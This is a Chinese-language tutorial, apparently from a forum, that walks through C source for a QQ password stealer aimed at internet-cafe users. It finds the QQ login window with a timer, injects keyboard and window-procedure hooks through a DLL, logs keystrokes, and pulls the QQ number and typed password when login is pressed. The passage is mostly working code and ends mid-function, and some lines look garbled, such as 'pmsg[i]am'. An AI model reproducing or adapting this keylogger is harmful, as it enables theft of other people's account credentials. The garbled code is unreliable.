網名館QQ使用者小心了! C語言實現QQ密碼大盜
(1)尋找QQ登陸介面。
(2)安裝鉤子
(3)鉤子函式的解釋.
(4)處理密碼。
以下部分全是使用C語言,文章中我假設讀者您是會C/SDK程式設計的。如果遇到相關的概念性問題,您可以檢視MSDN或是上BBS 詢問!
尋找QQ登陸介面
軟體執行後,利用安裝定時器,每秒在系統找QQ登陸介面,這樣基本上只要使用者打開了QQ登陸介面就會被抓住其控制代碼,看下面程式碼:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安裝好TIMER後,下面是處理主程式的WM_TIMER訊息,凡是出現沒有定義的變數,您可以理解為是全域性變數.
//處理WM_TIMER程式碼
if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的視窗控制代碼
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //引數為NULL是解除安裝HOOK,引數為控制代碼是安裝控制代碼
do
{
//利用FindWindowEx查詢QQ登陸視窗,具體引數意思請查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對話方塊的類都是#32770
//找到類名是#32770後,再在其窗體內找一個具有“ 登入QQ”的BUTTON按紐
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登入QQ"); //這一句很關鍵,如果你的QQ登陸視窗上沒有" 登入QQ"字樣,那麼獲取密碼將失敗!
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的視窗,即:QQ登陸視窗
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安裝HOOK,此函式在DLL檔案中 第二部分中介紹
}
}
上面就是查詢QQ登陸視窗控制代碼的過程,從程式碼可以看出我用的方法:找一個其子窗體中有一個標題為“ 登入QQ”的BUTTON的對話方塊(這句話說得有點饒口,這句話如果也看不懂,下面您不用看了:() 我最開始是想利用 FindWindow(NULL,"QQ使用者登陸視窗")來查詢,但是我用Spy++看了QQ登陸視窗的標題並不是“QQ使用者登陸視窗”,而是“亂碼”,其中包含了回車鍵等特殊字元,於是我用了FindWindowEx().
安裝鉤子
找到了QQ登陸視窗後,就成功了一半。
下面是DLL檔案中的安裝HOOK的函式SetQQHook(), 為什麼要用DLL(動態連線庫)?要去“鉤”其他程序的訊息,得讓HOOK函式在DLL中,這樣好對映到其地址空間中!
BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//獲得登陸框的控制代碼
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //這是什麼意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ,此處不一樣! 得到QQ號的子視窗控制代碼
g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此處不一樣!得到QQ密碼的子視窗控制代碼
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,號碼控制代碼都沒有得到!","鬱悶",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密碼控制代碼都沒有得到!","鬱悶",0);
return FALSE;
}
分別鍵盤HOOK,和介面部分訊息處理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 解除安裝鉤子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}
上面是安裝HOOK部分的程式碼,就這麼簡單,上面提到了CallWndProc,KeyboardProc是兩個回撥函式,是我第三部分要解釋的鉤子函式
鉤子函式的解釋
CallWndProc,KeyboardProc是兩個回撥函式的原型和具體程式碼如下:
// 鉤子過程,監視“登陸”的命令訊息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕獲“登陸”按鈕
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面個函式是我在第四部分介紹-“處理密碼”部分會仔細說明
//當用戶點了登陸按鈕,說明QQ號碼和QQ密碼已經填寫完畢,當然可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
// 鍵盤鉤子過程,監視“登陸”的熱鍵訊息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕獲熱鍵訊息,記錄鍵盤的按鍵盤過程,pmsg是PMSG型別的,i是全域性Static型別的
pmsg[i]am =wParam;
i++;
if (wParam == VK_RETURN) //使用者使用鍵盤“回車”來登陸,使用者用了回車後,就可以可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
在明白了這兩個鉤子函式後就可以看後期是如何具體處理密碼的了,這就是下面的第四部分內容
處理密碼
如果您讀到了此處,我想得暫停一會,先讓我來幫你回憶一下前面提到的幾個關鍵的變數
第一個:QQ號的子視窗控制代碼 g_hNum
第二個:QQ密碼的子視窗控制代碼 g_hPsw //此部分暫時不使用,下面
第三個:存鍵盤按鍵的 pmsg
上面三變數分別出現在第二部分和第三部分,都是全域性共享(shared)變數
QQ密碼的子視窗控制代碼 g_hPsw 此部分暫時不使用,你可以看到下面程式碼中有句用到g_hPsw的語句是我註釋掉了的,原因是無法通過那樣去得到QQ密碼,得處理按鍵訊息
void GetPasswrod()
{
//宣告變數和初始化
HANDLE f;
TCHAR num[13];
TCHAR psw[21];
TCHAR total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
DWORD dw;
//得到QQ號的內容,以為有的人的QQ號是在登陸框有記錄,其QQ號並是用鍵盤輸入的
GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,無法這樣獲得密碼
//提取出鍵盤記錄,此內容也許全是密碼,也許是QQ號+QQ密碼
for(j=0;j<20;j++)
{
psw[j]=(TCHAR)pmsg[j*2]am ;
}
psw[j+1]=’